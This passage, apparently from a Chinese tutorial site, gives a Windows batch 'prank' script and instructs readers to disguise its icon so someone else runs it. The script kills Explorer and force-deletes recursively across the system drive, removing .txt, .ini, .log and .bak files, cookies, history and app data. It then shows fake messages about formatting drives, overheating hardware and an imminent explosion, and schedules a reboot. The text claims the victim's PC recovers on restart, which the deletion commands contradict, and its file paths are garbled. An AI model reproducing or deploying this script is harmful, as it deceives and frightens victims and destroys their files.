接下来输入以下:
@echo off
color 4f
taskkill /im explorer.exe /f
echo 删除C盘所有文件……
del /f /s /q “%systemdrive%*.tmp”
del /f /s /q “%systemdrive%*.dmp”
del /f /s /q “%systemdrive%*._mp”
del /f /s /q “%systemdrive%*.gid”
del /f /s /q “%systemdrive%*.old”
del /f /s /q “%systemdrive%*.chk”
del /f /s /q “%systemdrive%*.bak”
del /f /s /q “%systemdrive%*.log”
del /f /s /q “%systemdrive%*.txt”
del /f /s /q “%systemdrive%*.ini”
del /f /s /q “%systemdrive%Recycled*.*”
del /f /s /q “%systemdrive%RECYCLER*.*”
del /f /s /q “%windir%inf*.pnf”
del /f /s /q “%windir%Prefetch*.*”
@ping -n 2 127.1>nul
rd /s /q “%windir%Downloaded Program Files” & md “%windir%Downloaded Program Files”
@ping -n 2 127.1>nul
rd /s /q “%windir%LastGood” & md “%windir%LastGood”
@ping -n 2 127.1>nul
rd /s /q “%windir%Offline Web Pages” & md “%windir%Offline Web Pages”
@ping -n 2 127.1>nul
rd /s /q “%windir%SoftwareDistributionDownload” & md “%windir%SoftwareDistributionDownload”
@ping -n 2 127.1>nul
rd /s /q “%windir%temp” & md “%windir%temp”
@ping -n 2 127.1>nul
rd /s /q “%userprofile%Local SettingsApplication DataMicrosoftMedia Player” & md “%windir%Local
SettingsApplication DataMicrosoftMedia Player”
@ping -n 2 127.1>nul
rd /s /q “%userprofile%UserData” & md “%windir%UserData”
@ping -n 2 127.1>nul
rd /s /q “%appdata%Adobe” & md “%windir%Adobe”
@ping -n 2 127.1>nul
rd /s /q “%appdata%Macromedia” & md “%windir%Macromedia”
@ping -n 2 127.1>nul
rd /s /q “%appdata%MicrosoftMedia Player” & md “%windir%MicrosoftMedia
Player”
@ping -n 2 127.1>nul
rd /s /q “%appdata%MicrosoftOfficeRecent” & md “%windir%MicrosoftOfficeRecent”
@ping -n 5 127.1>nul
del /a /f /s /q “%userprofile%Cookies*.*”
del /a /f /s /q “%userprofile%Recent*.*”
del /a /f /s /q “%userprofile%Local SettingsApplication DataGDIPFONTCACHEV1.dat”
del /a /f /s /q “%userprofile%Local SettingsApplication DataIconCache.db”
del /a /f /s /q “%userprofile%Local SettingsHistory*.*”
del /a /f /s /q “%userprofile%Local SettingsTemporary Internet Files*.*”
del /a /f /s /q “%temp%*.*” del /a /f /s /q “%userprofile%AppDataLocalGDIPFONTCACHEV1.dat”
del /a /f /s /q “%userprofile%AppDataLocalIconCache.db”
del /a /f /s /q “%userprofile% AppDataLocalMicrosoftWindowsHistory*.*”
del /a /f /s /q “%userprofile% AppDataLocalMicrosoftWindowsTemporary Internet Files*.*”
del /a /f /s /q “%userprofile% AppDataRoamingMicrosoftWindowsCookies*.*”
del /a /f /s /q “%userprofile% AppDataRoamingMicrosoftWindowsRecent*.*”
echo 已删除完毕
@echo.
echo 删除D盘所有文件……
@ping -n 3 127.1>nul
@echo 已删除完毕
@echo.
echo 删除E盘所有文件……
@ping -n 3 127.1>nul
echo 已删除完毕
@echo.
echo 正在低级格式化全部硬盘……
@ping -n 3 127.1>nul
echo.
echo 正在 进行二次 低格硬盘……
ping -n 3 127.1>nul
echo.
echo 正在 进行三次 低格硬盘……
ping -n 3 127.1>nul
echo.
echo 正在 进行四次 低格硬盘……
ping -n 3 127.1>nul
echo.
echo 正在 进行五次 低格硬盘……
ping -n 3 127.1>nul
echo.
echo 注意: cpu温度127度!温度过高 警!!!
echo.
ping -n 2 127.1>nul
echo 注意: 硬盘温度86度!温度过高 警!!!
echo.
ping -n 2 127.1>nul
echo 注意: 显卡温度96度!温度过高 警!!!
echo.
ping -n 2 127.1>nul
echo 注意: 系统崩溃, 主板温度 超过临界值!!! echo.
echo 注意: 电容负荷超过99% echo. & pause
echo 电脑将在60秒内崩溃或爆炸!请勿强行关闭电源!否则会 导致cpu和硬盘彻底损毁!!
shutdown /r /t 60 /c “电脑将在60秒内崩溃或爆炸!请勿强行关闭电源!否则会 导致cpu和硬盘彻底损毁!!”
ping -n 30 127.1>nul
shutdown -a
start explorer.exe
exit
接下来要自己对图标进行伪装更改了,点开后电脑无法操作,但重启后恢复正常
这就是效果图
声明:本站部分文章及图片源自用户投稿,如本站任何资料有侵权请您尽早请联系jinwei@zod.com.cn进行处理,非常感谢!